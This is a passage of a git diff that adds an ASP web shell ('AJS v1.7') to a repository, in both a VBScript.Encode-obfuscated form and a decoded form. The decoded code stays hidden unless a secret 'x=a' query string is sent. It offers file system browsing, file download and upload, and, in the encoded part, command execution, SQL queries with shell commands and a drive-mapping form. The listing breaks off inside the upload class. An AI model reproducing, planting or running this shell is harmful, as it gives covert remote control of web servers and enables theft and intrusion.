/RMkDnPr@!rxaEO~DXwxtbNNU~xm:'EJsG1lOkKUJrP-C^E+xErJEP&9{JED6DEw^Wm[SKmCYbWUEr@*J@#@&I/wKUd+cMkO+~Etla),@!k	w;O,YX2n{JEYaDJE,xm:+{JrhlXJEP7ls;'JrqJrP/b"n'rJyJEP(9{JEk9\lXJE@*,@!kU2!Y~YH2'Er4!YYKxrEP7lsE'EEU+YrEPKxm^r^3{Jr/nYr[v#IJr@*J@#@&]nkwWUdR	DbOPE@!Ym4V@*r@#@&"+dwKxdncDbO+,J@!D.@*J@#@&"+dwGUk+ MrYPE@!DNPr[{JEEar9JE@*J@#@&I/aGxk+ MkOn,J@!JON@*J@#@&]n/aW	/nR	.bYnPr@!zDD@*E@#@&IndaWU/ qDrD+,J@!JYm8V@*E@#@&IndaWxknRqDkDn~J@!k	w;Y~OHwn'k;4skO~7lV;n{JE)=~,j2^WmNP,)=EJ@*J@#@&"+d2Kx/ MkY~E@!J0KDh@*E@#@&In/aGxk+ 	MkYn~r@!dmMraY@*r@#@&I+kwKU/R	DbYn~r/+DrNv#ir@#@&I/aWU/n qDrY~J6EU^DkWU~k+Ok9c*P`r@#@&I+kwKU/R	DbYn~rPP,~/DD'EvIJ@#@&"+dwGUk+ MrYPE~,PPrW,`L+D(9`v6Dsjw^Wm[B*RhlXR-C^E+@!x!*PoO(NvB6Dhj2sKl[B* :m6 -mVEnx8iE@#@&]/2Kxk+RqDbO+,J~P,PrW,`oOq9`B6.hjaVKl[Bb slaR7CV!+~@*,F!b~T+Oq9cE0.sjaVWmNEbRslaR7ls;'FZIJ@#@&Id2W	/R	DrOPEP,~P6W.~vk'qI,k@!'TnDq[vB6D:`w^Gl9BbRsla 7lV!ni,k_3b~/DD3'vsrsPv_bQB=P@!r	wEO~kk"+{fZPOHw'0bV~xm:n'6ksnE_k3v@*@!4D@*vIJ@#@&"+dwGUk+ MrYPE~,PPLnDq[`E;ak[E#ckx	+MuKtSx/DDQv@!4D@*vir@#@&"ndwKxk+ .rD+~J)E@#@&IndaWxdnc.kDn,J@!J/1DkaY@*E@#@&In/aWUdRMrYPJ@!&ON@*@!JY.@*@!&Dl8V@*J@#@&]nkwWUdR	DbOPE@!z9k\@*J@#@&@#@&In/aWUdRMrYPJ@![r\,k9'EJO8^ZhNrEPkYzs'JE[b/2Vmz=xG	+rJPmVbLx{JEmxOnMJJ@*E@#@&I+k2Gxk+c.kOn,J@!0K.:,WUj!4:rO{JED!U;H9v#pD+DEMUP6ls/iEE,:+D4W9'Jr2G/DJr@*E@#@&]/2W	d+c.rD+PE@!Dl8V~1VCk/{JJ04MO:rJ@*J@#@&]nkwW	d+cDbOnPr@!:I@*@!P9,lskTU'EmnUD+Dv@*@!b~tMn6'ErLm\lkmMrwD)dtKh\G9+`E36aVWMn.BBPDD;+bIrJ@*$~Cm0POG,ADGAk+.T@!&z@*@!JKG@*@!JK"@*J@#@&]+kwGUk+Rq.kD+Pr@!PI@*@!:f~lsrTxxB1nxD+.v@*@!4@*/K:hl	[,)~@!z(@*@!bxa;Y,/OX^+xv1WVK.'[fbw99!EP	lh+xEr\^Wshl	NEE,kNxEr\^Wshmx[rJ,/k.+{v*FB~\mV;n{Bka^W	0kT~&l^VEPOX2n{BO+XOB@*@!rUaEY~-mV;+{ErRl,I!xP=RrEPDX2+{Bd;(:kDv@*@!zKG@*@!z:I@*J@#@&]nkwGxknRqDrOPJ@!OM@*E@#@&]/2Kxk+RqDbO+,J@!Y9PCsbox{EJ1+xDn.Jr@*r@#@&IndaWU/ MkOn,J@!OnXYCDC,xCs+{JJD6D/:9In/!VOErPk9xJrY6D/hN"+kEsYEE,/OX^n'Ehr[Dt)XZi4+bL4YlW!ZiB@*J@#@&I/2W	/n qDkDnPr@!zDnaYmDl@*J@#@&"+dwKU/R	.bY+~E@!zON@*@!JY.@*@!JYl(V@*@!J0GDs@*E@#@&I+k2W	/+c	.kD+,J@!z[r7@*E@#@&@#@&"+d2Kx/n qDrY~r@![b\,kN{JrO4^?5VrJ~dDXVxJrNkk2slH)	WU+EE,lskTU'rJ^n	Y+.Er@*E@#@&]/2Kxk+RqDbO+,J@!0KDh~Kx?!8:bY'rE.E	?5Sc#I.Y;D	~0mVdnpJJ~hY4W9xrJ2K/DJJ@*J@#@&I/2W	/n qDkDnPr@!Ym8s+,m^ld/xEr38DDhJr@*E@#@&I+d2Kxd+c	MkOPr@!K"@*@!Pf,lskTxxv1+xDnDEPmKsdwmx{B*B~^^ld/{EJ04.OsJJ@*@!zP4DW{JENl7l/1Db2Y=/4WSHG[`BAaw^WD.v~,YMEn#IEr@*,Am^3,YG~~DWAdDD@!J)@*@!&:f@*@!z:I@*E@#@&In/aWUdRMrYPJ@!P]@*r@#@&In/2G	/nRq.kD+~E@!Kf@*@!(@*/W	UmObW	P?DDbUo,)~@!J4@*@!JKf@*@!KGPmKsdwmx{BfB@*@!bx2ED~/DXsn{BmGsKDxaG)wf9ZB,xls+{EJk;smKxUn1YkKUJrPk9xEJk;^mGxUn1YrW	EJ,/r"'Bq+8B~\ms!+xEnMW\bN.'UpJrd29$pflDCPUWEM^n'8 FRTRT 8i[lDC4m/nxsl/OnMi;k9xklIah9'iEPDzw'vY6Ov@*@!z:9@*r@#@&"ndwKxk+ .rD+~J@!&K"@*E@#@&I+d2Kxd+c	MkOPr@!K"@*r@#@&"+dwKxdncDbO+,J@!:9~\mVboU'vOKwv@*@!8@*UpJ~;W:hC	N~),@!J4@*@!z:f@*@!KG~\mVro	'vOKwB@*@!k	wED~OXa+{JE4;ODWUJr~k9'EE1W:hC	N/tmUT+ErPKxZ^k1V'rJd;^ZGhslx9/tmxocbirJ,\CV;n{JEP@!R@*,JE@*@!zK9@*r@#@&IdaWUk+cDbY~J@!K9@*@!kU2!YPkOX^+'E^GVKD{a9bo9G!vP	C:'EEk;V^Gs:Cx9ErPr9'rJ/$V1G:slUNrJ~dby+{vFZ!B,-CV!+{Bj2J3;K~K}KP8!TT,ePo]}H~k	WKDhmYbWx|/14+sl Ym4snkBPDzw'BDnaYE@*@!Yn6OCM+CP	C:'EED6Yd5^mG:sC	NErPbN'rJDaYk;smK:hC	NJr~/DXVxvNb/aVCXlUKxniSrNDtly!waI4+ro4O=FXZwXiB@*?AJ2;K~K}n~qZ!!,MPwIrt~rx6WM:CYrG	{dm4n:mROC(V+d@!JYn6DCM+C@*@!JKf@*J@#@&I/2W	/n qDkDnPr@!KG~-l^kTxxBOGaB@*@!bUw!Y~OHw+xEr/;4srDJE,\mVE'rE)=P]E	PllrJ@*@!&KG@*@!JP]@*r@#@&In/2G	/nRq.kD+~E@!KI@*E@#@&]+k2KxdRqDkD+,E@!:f~mKVd2mx'E*B,lVbLU'rJ1+UYn.rJ@*@!(@*@!6WUO,mWsGM'GDmUT+~bN{JJm06nmD+[Jr@*T@!J0W	O@*,DWScd#,@!kwCx~r9'EJ^dYz0WEr@*VrdD+[@!JdalU@*Pe@!z(@*@!&KG@*E@#@&IndaWxknRqDkDn~J@!z:I@*J@#@&"+dwKU/R	.bY+~E@!zOl(s@*E@#@&"+/aW	d+c.kD+~E@!z0K.:@*J@#@&]n/aW	/nR	.bYnPr@!n@*[U8kwi@!&h@*E@#@&@#@&InkwKx/Rq.kD+~J@!YC8^+P1slk/'rEV4MYsJEPr[{JE/$sZKxOn	YJE~Sk[Y4xrJ1l]rJ@*r@#@&]+kwGxk+ 	MkY~J@!zYm8s+@*J@#@&@#@&]nkwGxknRqDrOPJ@!&9k-@*r@#@&@#@&@#@&"+/aW	d+c.kD+~E@!Nk7~l^ko	xEJ1+	YnDEE@*J@#@&"n/aWUdR.rD+~J@!Om4sPbN'rJD8VGDr\DdErPmsValN9rUo{Jr!EJ~^Vs/aCmbxLxrJ!EE,hrND4{JEy!ZJJ@*@!:$rG5@*J@#@&]nkwW	d+cDbOnPr@!DD@*@!O[,mslkd'rJV8MY:EE,/OX^n{JE(l13oMW!UN mGVKDlqyF 8+JrPl^rLx{JrmnxOnMJE@*@!8@*GDr-D/@!&(@*@!zD[@*@!&DD@*J@#@&IdwKxd+c.rD+P9.k7+DkPn6D@#@&In/2G	/nRq.kD+~E@!YD~r9'EJm[9HCa1YhKD0EJ@*@!ON,msCk/'rE3(DYsEEPmVboU'EE1+UY.Jr@*@!C,tDnW{JELm-m/^MkaY)ktKAHmwH+DhG.0`#pEJ@*$P3~D@!Jl@*@!&Y[@*@!zOD@*E@#@&IndaWxdnc.kDn,J@!JK~rfI@*@!&Ym4s+@*J@#@&"+/aGxk+Rq.rYPr@!&Nr-@*J@#@&@#@&I/2G	/+ 	MkO+,E@!n@*Lx(/wp@!JK@*r@#@&I/2G	/+c	DbY+,E@!z9k7@*E@#@&@#@&In/aGxk+ 	MkYn~r@![k7~bNxrJD4Vt+	;JrPCVboUxrJmUYDJr@*@!A"@*Lx8/2Ir@#@&IdwKxdncDrOPE@!DC(Vn,mVVal9[k	oxJr!EE,m+^s/almbUL'rJZJEP4nbo4Y{EJy*EE@*@!Y.@*@!Y[P1sm/d{Jr34MYsqJr@*'x(/2ILx4k2iLx4k2I@!mP4Dn0xErLC\mdmMk2O=/tGAtW[+vvA62^WM+DE~,OD!+birJ@*@!(@*e,uWs+PC@!&A@*P@!zC@*~k,@!CP4.+6'EE[?pJEr@*@!4@*M,?}dPC@!z(@*@!&l@*PkP@!l~4M+0{va;HfE@*@!4@*e,Z\f~M@!z8@*@!&l@*[U8kwi'U(/2iLU(/2p@!JYN@*@!JOD@*@!&Ym4sn@*@!4M@*J@#@&Id2W	/R	DrOPE@!J[k7@*E@#@&@#@&]nkwGxknc.bYPJ@!Nb-PbNxJrY8stlwG.k7+DrE~l^kTxxJE^xO+MEJ@*J@#@&"+/2G	/nRq.bYn,J@!0WM:,GxUE8:bYxEr:la9Db\+McbiM+DE.x~WmVd+pEJ,:nO4WNxErwG/DEr@*E@#@&"+/aW	d+c.kD+~E@!Yl(s+,mVmdd'rJ04.YhEr@*E@#@&]+kwGUk+R	.bYnPr@!:I@*@!KGPl^kTU'EmnxD+.v,mW^dwmx'rE+Jr@*@!b~t.n6'EJNC\m/^.bwYl4bNnHm2g+OSWM3`*irE@*]ACm0POG,ADKA/DT@!&)@*@!z:f@*@!&P"@*E@#@&]+kwGUk+R	.bYnPr@!:I@*@!KGPl^kTU'EmnxD+.v@*fDb-+MPSOO+MP=P@!zP9@*@!Pf@*@!k	w;O,/Yzs'vmKsKDx[fzsfG!E~k9'EJ9Dr-DSOYDJr~dk.+{B+B~-mV;+{v(EPOza+'vO6OB@*@!JK9@*@!JKI@*J@#@&I/2W	/n qDkDnPr@!K"@*@!KGPmVroUxEmnxDnDE@*]nsWYn~UtCD~=P@!JKG@*@!:f@*@!k	w;Y,/Oz^+'E^W^WD{:9bwfG!vPr[{JEDhWD+j4mD+EE,/ryxEcTEP7lV!+{v-'?nD7+.wUtlMnB,YXanxBD+XYv@*@!&:f@*@!JPI@*J@#@&"+/2G	/nRq.bYn,J@!KI@*@!:9PmVro	'v^xY.B@*j/.Uls+,)@!zP9@*@!Pf@*@!k	w;O,/Yzs'vmKsKDx[fzsfG!E~k9'EJ!/n.gl:EJ,/k.nxBW!EP-ls;'v}]|VI6ih-b[hbxr/D.mYGMB,YXa+{vY6OB@*@!&PG@*@!JPI@*J@#@&]n/aW	/nR	.bYnPr@!K"@*@!PGPlsrTxxB1n	YnMB@*nlk/SGD9PlP@!zP9@*@!KG@*@!bxw!O~/DX^+xB^G^W.'[9bwf9TEPk[xrJ2lkdSW.9JrP/byxBW!vP7ls;'B8+&W*vF01!EPDX2+xvD+aYE@*@!JK9@*@!zK]@*r@#@&IdaWUk+cDbY~J@!Y.@*@!Y[~mVkTU'rJmUO+MJrP^WsdalU'rE rJ@*@!bxw;O,\CV!n{JEc),HlaP= JrPOXa+xvkE4srYE@*@!JO[@*@!zDD@*J@#@&"+dwKU/R	.bY+~E@!zOl(s@*@!J0KD:@*J@#@&I/2W	/n qDkDnPr@!z9r-@*r@#@&@#@&IndaWU/ MkOn,J@![r7PrN{ErW-D^lXrJ@*E@#@&In/aWUdRMrYPJ@!&[k7@*r@#@&@#@&]/2W	d+c.rD+PE@!9k-Pb[{JED4^SWmNbUorJ~l^kLU{JJ1nxD+DrE@*J@#@&"+dwGUk+ MrYPE@!Dl4sn,hrND4{JEy!ZJJ,tro4YxJrFTTrJPkOX^+'rE8l13TDGEU[=af!2T&Zi8GMN+.R^+WY=qa6~kW^kN,al[*9*[i,4G.9+D .kTtY=q26,/KVrN~:8 q 8+i,4G.9+DR8KYOWsl8wa,/KVk9P[q 8 q pP8GMN+MRYKw)82aPkW^k[P:X9*[*9IJrP^n^VwC[9kUo{Er!ErP1+V^/aCmbxL'rJTErP4K.ND'rETJr@*@!Y.@*@!O9PCVbLx{JE^xYn.rJ~\msboU{Jr:k9N^nJr@*@!kso~dMm'rEgsWNxr:mo[r:L(9'sWm[k	oEE@*@!zO[@*@!&YM@*@!zOm4^+@*r@#@&]+kwGxk+ 	MkY~J@!zNb-@*J@#@&@#@&]+d2Kxd+c	DbYn~r@!z8G9X@*J@#@&"+daW	/+cMrYPE@!JtOh^@*J@#@&vKirAA==^#~@%>
\ No newline at end of file
diff --git a/asp/ajs/shell_decoded.asp b/asp/ajs/shell_decoded.asp
new file mode 100644
index 00000000..c3390c5f
--- /dev/null
+++ b/asp/ajs/shell_decoded.asp
@@ -0,0 +1,2198 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%
+option explicit
+on error resume next
+
+Session.Timeout=30
+Server.ScriptTimeout = 7200
+session.lcid=2057
+
+
+'*************************  Varible  *************************
+Dim FSO, Fullpath, FilePath, FolderPath, folderLocation, js, aspTitle
+Dim mode
+
+'''''' Basic Settings '''''
+aspTitle = "AJS v1.7"
+'''''' Basic Settings '''''
+
+Set FSO = CreateObject("Scripting.FileSystemObject")
+Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1)
+FolderPath = Left(Fullpath,InStrRev(Fullpath,"\"))
+folderLocation = Request("location")
+mode = Request("mode")
+
+if(folderLocation = "" or folderLocation = "/" or folderLocation = "\") then
+	folderLocation = addslash(FolderPath)
+else
+	folderLocation = addslash(folderLocation)
+end if
+
+If (LCase(Request.ServerVariables("QUERY_STRING"))="x=a") Then
+	Session("allow")=1
+	Session("myFolderList") = Array("noxxxinfo")
+	Session("myFileList") = Array("noxxxinfo")
+	Response.CacheControl = "no-cache"
+	Response.Status = "301 Moved Permanently"
+	Response.Expires = 0
+	Response.Expiresabsolute = Now() - 1
+	Response.AddHeader "pragma","no-cache"
+	Response.AddHeader "cache-control","private"
+	Response.AddHeader "Location", FilePath
+	Response.End
+End If
+
+If (Session("allow") <> 1) Then
+	Response.Expires = 0
+	Response.Expiresabsolute = Now() - 1
+	Response.AddHeader "pragma","no-cache"
+	Response.AddHeader "cache-control","private"
+	Response.CacheControl = "no-cache"
+	Response.End
+End If
+
+Session("allow")=1
+'*************************  Varible  *************************
+
+'*************************  JSON.asp  *************************
+class JSON
+
+	'private members
+	private output, innerCall
+
+	'public members
+	public toResponse		''[bool] should the generated representation be written directly to the response (using <em>Response.Write</em>)? default = false
+	public recordsetPaging	''[bool] indicates if only the current page should be processed on paged recordsets.
+							''e.g. would return only 10 records if <em>RS.pagesize</em> is set to 10. default = false (means that always all records are processed)
+
+	public sub class_initialize()
+		newGeneration()
+		toResponse = false
+		recordsetPaging = false
+	end sub
+
+	public function escape(val)
+		dim cDoubleQuote, cRevSolidus, cSolidus
+		cDoubleQuote = &h22
+		cRevSolidus = &h5C
+		cSolidus = &h2F
+		dim i, currentDigit
+		for i = 1 to (len(val))
+			currentDigit = mid(val, i, 1)
+			if ascw(currentDigit) > &h00 and ascw(currentDigit) < &h1F then
+				currentDigit = escapequence(currentDigit)
+			elseif ascw(currentDigit) >= &hC280 and ascw(currentDigit) <= &hC2BF then
+				currentDigit = "\u00" + right(padLeft(hex(ascw(currentDigit) - &hC200), 2, 0), 2)
+			elseif ascw(currentDigit) >= &hC380 and ascw(currentDigit) <= &hC3BF then
+				currentDigit = "\u00" + right(padLeft(hex(ascw(currentDigit) - &hC2C0), 2, 0), 2)
+			else
+				select case ascw(currentDigit)
+					case cDoubleQuote: currentDigit = escapequence(currentDigit)
+					case cRevSolidus: currentDigit = escapequence(currentDigit)
+					case cSolidus: currentDigit = escapequence(currentDigit)
+				end select
+			end if
+			escape = escape & currentDigit
+		next
+	end function
+
+	public default function toJSON(name, val, nested)
+		if not nested and not isEmpty(name) then write("{")
+		if not isEmpty(name) then write("""" & escape(name) & """: ")
+		generateValue(val)
+		if not nested and not isEmpty(name) then write("}")
+		toJSON = output
+
+		if innerCall = 0 then newGeneration()
+	end function
+
+	'******************************************************************************************************************
+	'* generate
+	'******************************************************************************************************************
+	private function generateValue(val)
+		if isNull(val) then
+			write("null")
+		elseif isArray(val) then
+			generateArray(val)
+		elseif isObject(val) then
+			dim tName : tName = typename(val)
+			if val is nothing then
+				write("null")
+			elseif tName = "Dictionary" or tName = "IRequestDictionary" then
+				generateDictionary(val)
+			elseif tName = "Recordset" then
+				generateRecordset(val)
+			elseif tName = "IRequest" then
+				set req = server.createObject("scripting.dictionary")
+				req.add "clientcertificate", val.ClientCertificate
+				req.add "cookies", val.cookies
+				req.add "form", val.form
+				req.add "querystring", val.queryString
+				req.add "servervariables", val.serverVariables
+				req.add "totalbytes", val.totalBytes
+				generateDictionary(req)
+			elseif tName = "IStringList" then
+				if val.count = 1 then
+					toJSON empty, val(1), true
+				else
+					generateArray(val)
+				end if
+			else
+				generateObject(val)
+			end if
+		else
+			'bool
+			dim varTyp
+			varTyp = varType(val)
+			if varTyp = 11 then
+				if val then write("true") else write("false")
+			'int, long, byte
+			elseif varTyp = 2 or varTyp = 3 or varTyp = 17 or varTyp = 19 then
+				write(cLng(val))
+			'single, double, currency
+			elseif varTyp = 4 or varTyp = 5 or varTyp = 6 or varTyp = 14 then
+				write(replace(cDbl(val), ",", "."))
+			else
+				write("""" & escape(val & "") & """")
+			end if
+		end if
+		generateValue = output
+	end function
+
+	'******************************************************************************************************************
+	'* generateArray
+	'******************************************************************************************************************
+	private sub generateArray(val)
+		dim item, i, stId
+		write("[")
+		if(val(0) <> "noxxxinfo") then
+			stId = 0
+		else
+			stId = 1
+		end if
+		'the for each allows us to support also multi dimensional arrays
+		for i = stId to UBound(val)
+			if i > stId then write(",")
+			generateValue(val(i))
+		next
+		write("]")
+	end sub
+
+	'******************************************************************************************************************
+	'* generateDictionary
+	'******************************************************************************************************************
+	private sub generateDictionary(val)
+		innerCall = innerCall + 1
+		if val.count = 0 then
+			toJSON empty, null, true
+			exit sub
+		end if
+		dim key, i
+		write("{")
+		i = 0
+		for each key in val
+			if i > 0 then write(",")
+			toJSON key, val(key), true
+			i = i + 1
+		next
+		write("}")
+		innerCall = innerCall - 1
+	end sub
+
+	'******************************************************************************************************************
+	'* generateRecordset
+	'******************************************************************************************************************
+	private sub generateRecordset(val)
+		dim i, curRow, colValue
+		write("[")
+		curRow = 0
+		'recordset.pagesize = -1 means it is not paged.
+		while not val.eof and ((recordsetPaging and curRow < val.pageSize) or val.recordCount = -1 or not recordsetPaging)
+			innerCall = innerCall + 1
+			redim colValue(val.fields.count - 1)
+			for i = 0 to val.fields.count - 1
+				if  IsNull(val.fields(i).value) then
+					colValue(i) = "NULL"
+				elseif (Trim(val.fields(i).value)="") then
+					colValue(i) = "&nbsp;"
+				else
+					colValue(i) = Server.HtmlEncode(val.fields(i).value)
+				end if
+			next
+			generateArray(colValue)
+			val.movenext()
+			curRow = curRow + 1
+			if not val.eof and ((recordsetPaging and curRow < val.pageSize) or val.recordCount = -1 or not recordsetPaging) then write(",")
+			innerCall = innerCall - 1
+		wend
+		write("]")
+	end sub
+
+	'******************************************************************************************************************
+	'* generateRecordset
+	'******************************************************************************************************************
+	private sub generateRecordsetX(val)
+		dim i, curRow
+		write("[")
+		curRow = 0
+		'recordset.pagesize = -1 means it is not paged.
+		while not val.eof and ((recordsetPaging and curRow < val.pageSize) or val.recordCount = -1 or not recordsetPaging)
+			innerCall = innerCall + 1
+			write("{")
+			for i = 0 to val.fields.count - 1
+				if i > 0 then write(",")
+				toJSON lCase(val.fields(i).name), val.fields(i).value, true
+			next
+			write("}")
+			val.movenext()
+			curRow = curRow + 1
+			if not val.eof and ((recordsetPaging and curRow < val.pageSize) or val.recordCount = -1 or not recordsetPaging) then write(",")
+			innerCall = innerCall - 1
+		wend
+		write("]")
+	end sub
+
+	'******************************************************************************************************************
+	'* generateObject
+	'******************************************************************************************************************
+	private sub generateObject(val)
+		dim props
+		on error resume next
+		set props = val.reflect()
+		if err = 0 then
+			on error goto 0
+			innerCall = innerCall + 1
+			toJSON empty, props, true
+			innerCall = innerCall - 1
+		else
+			on error goto 0
+			write("""" & escape(typename(val)) & """")
+		end if
+	end sub
+
+	'******************************************************************************************************************
+	'* newGeneration
+	'******************************************************************************************************************
+	private sub newGeneration()
+		output = empty
+		innerCall = 0
+	end sub
+
+	'******************************************************************************************
+	'* JsonEscapeSquence
+	'******************************************************************************************
+	private function escapequence(digit)
+		escapequence = "\u00" + right(padLeft(hex(ascw(digit)), 2, 0), 2)
+	end function
+
+	'******************************************************************************************
+	'* padLeft
+	'******************************************************************************************
+	private function padLeft(value, totalLength, paddingChar)
+		padLeft = right(clone(paddingChar, totalLength) & value, totalLength)
+	end function
+
+	'******************************************************************************************
+	'* clone
+	'******************************************************************************************
+	private function clone(byVal str, n)
+		dim i
+		for i = 1 to n : clone = clone & str : next
+	end function
+
+	'******************************************************************************************
+	'* write
+	'******************************************************************************************
+	private sub write(val)
+		if toResponse then
+			Response.Write(val)
+		else
+			output = output & val
+		end if
+	end sub
+
+end class
+'*************************  JSON.asp  *************************
+
+
+'*************************  Func.asp  *************************
+function addslash(path)
+    if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+Function FormatSize(intSize)
+	If (intSize < 1024) Then
+		FormatSize = intSize & " B"
+	ElseIf (intSize < 1024*1024) Then
+		FormatSize = FormatNumber(intSize/1024,2) & " KB"
+	ElseIf (intSize < 1024*1024*1024) Then
+		FormatSize = FormatNumber(intSize/(1024*1024),2) & " MB"
+	Else
+		FormatSize = FormatNumber(intSize/(1024*1024*1024),2) & " GB"
+	End If
+End Function
+
+Function Base64Encode(inData)
+  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
+  Dim cOut, sOut, I
+
+  For I = 1 To Len(inData) Step 3
+    Dim nGroup, pOut, sGroup
+
+    nGroup = &H10000 * Asc(Mid(inData, I, 1)) + _
+      &H100 * MyASC(Mid(inData, I + 1, 1)) + MyASC(Mid(inData, I + 2, 1))
+
+    nGroup = Oct(nGroup)
+
+    nGroup = String(8 - Len(nGroup), "0") & nGroup
+
+    pOut = Mid(Base64, CLng("&o" & Mid(nGroup, 1, 2)) + 1, 1) + _
+      Mid(Base64, CLng("&o" & Mid(nGroup, 3, 2)) + 1, 1) + _
+      Mid(Base64, CLng("&o" & Mid(nGroup, 5, 2)) + 1, 1) + _
+      Mid(Base64, CLng("&o" & Mid(nGroup, 7, 2)) + 1, 1)
+
+    sOut = sOut + pOut
+
+  Next
+  Select Case Len(inData) Mod 3
+    Case 1: '8 bit final
+      sOut = Left(sOut, Len(sOut) - 2) + "=="
+    Case 2: '16 bit final
+      sOut = Left(sOut, Len(sOut) - 1) + "="
+  End Select
+  Base64Encode = sOut
+End Function
+
+Function MyASC(OneChar)
+  If OneChar = "" Then MyASC = 0 Else MyASC = Asc(OneChar)
+End Function
+
+
+Function Base64Decode(ByVal base64String)
+  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
+  Dim dataLength, sOut, groupBegin
+
+  base64String = Replace(base64String, vbCrLf, "")
+  base64String = Replace(base64String, vbTab, "")
+  base64String = Replace(base64String, " ", "")
+
+  dataLength = Len(base64String)
+  If dataLength Mod 4 <> 0 Then
+    Err.Raise 1, "Base64Decode", "Bad Base64 string."
+    Exit Function
+  End If
+
+
+  For groupBegin = 1 To dataLength Step 4
+    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
+    numDataBytes = 3
+    nGroup = 0
+
+    For CharCounter = 0 To 3
+
+      thisChar = Mid(base64String, groupBegin + CharCounter, 1)
+
+      If thisChar = "=" Then
+        numDataBytes = numDataBytes - 1
+        thisData = 0
+      Else
+        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
+      End If
+      If thisData = -1 Then
+        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
+        Exit Function
+      End If
+
+      nGroup = 64 * nGroup + thisData
+    Next
+
+    nGroup = Hex(nGroup)
+
+    nGroup = String(6 - Len(nGroup), "0") & nGroup
+
+    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
+      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
+      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
+
+    sOut = sOut & Left(pOut, numDataBytes)
+  Next
+
+  Base64Decode = sOut
+End Function
+
+
+Function Base64ToBSTR(strBase64)
+    Dim Byte1, Byte2, Byte3, Byte4
+    Dim Data
+    Dim iterator
+    Const CharMap = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
+
+    For iterator = 0 To Len(strBase64) - 1 Step 4
+        Byte1 = InStr(CharMap, Mid(strBase64, iterator + 1, 1)) - 1
+        Byte2 = InStr(CharMap, Mid(strBase64, iterator + 2, 1)) - 1
+        Byte3 = InStr(CharMap, Mid(strBase64, iterator + 3, 1)) - 1
+        Byte4 = InStr(CharMap, Mid(strBase64, iterator + 4, 1)) - 1
+
+        Data = Data & ChrB(Byte1 * 4 + Byte2 \ 16)
+
+        If Byte3 >= 0 Then
+            Data = Data & ChrB((Byte2 And 15) * 16 + Byte3 \ 4)
+        Else
+            Data = Data & ChrB((iterator * 3 \ 4 + 1) = (Byte2 And 15) * 16)
+        End If
+
+        If Byte4 >= 0 Then
+            Data = Data & ChrB((Byte3 And 3) * 64 + Byte4)
+        End If
+    Next
+    Base64ToBSTR = Data
+End Function
+
+
+
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+
+' -----------------------------------------
+' URL decode to retrieve the original value
+
+Function URLDecode(sConvert)
+    Dim aSplit
+    Dim sOutput
+    Dim I
+    If IsNull(sConvert) Then
+       URLDecode = ""
+       Exit Function
+    End If
+
+    ' convert all pluses to spaces
+    sOutput = REPLACE(sConvert, "+", " ")
+
+    ' next convert %hexdigits to the character
+    aSplit = Split(sOutput, "%")
+
+    If IsArray(aSplit) Then
+      sOutput = aSplit(0)
+      For I = 0 to UBound(aSplit) - 1
+        sOutput = sOutput & _
+          Chr("&H" & Left(aSplit(i + 1), 2)) &_
+          Right(aSplit(i + 1), Len(aSplit(i + 1)) - 2)
+      Next
+    End If
+
+    URLDecode = sOutput
+End Function
+
+Private Sub DownloadFile(file)
+ 	    '--declare variables
+ 	    Dim strAbsFile
+ 	    Dim strFileExtension
+ 	    Dim objFSO
+ 	    Dim objFile
+ 	    Dim objStream
+ 	    '-- set absolute file location
+ 	    strAbsFile = file
+ 	    '-- create FSO object to check if file exists and get properties
+ 	    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
+ 	    '-- check to see if the file exists
+ 	    If objFSO.FileExists(strAbsFile) Then
+ 	        Set objFile = objFSO.GetFile(strAbsFile)
+ 	        '-- first clear the response, and then set the appropriate headers
+ 	        Response.Clear
+ 	        '-- the filename you give it will be the one that is shown
+ 	        ' to the users by default when they save
+ 	        Response.AddHeader "Content-Disposition", "attachment; filename=" & objFile.Name
+			Response.AddHeader "Content-Length", objFile.Size
+ 	        Response.ContentType = "application/octet-stream"
+ 	        Set objStream = Server.CreateObject("ADODB.Stream")
+ 	        objStream.Open
+ 	        '-- set as binary
+ 	        objStream.Type = 1
+ 	        Response.CharSet = "UTF-8"
+ 	        '-- load into the stream the file
+ 	        objStream.LoadFromFile(strAbsFile)
+ 	        '-- send the stream in the response
+ 	        Response.BinaryWrite(objStream.Read)
+ 	        objStream.Close
+ 	        Set objStream = Nothing
+ 	        Set objFile = Nothing
+ 	    Else 'objFSO.FileExists(strAbsFile)
+ 	        Response.Clear
+ 	        Response.Write("No such file exists.")
+ 	    End If
+ 	    Set objFSO = Nothing
+End Sub
+
+'*************************  Upload  *************************
+Class FileUploader
+	Public  Files
+	Public mcolFormElem
+
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
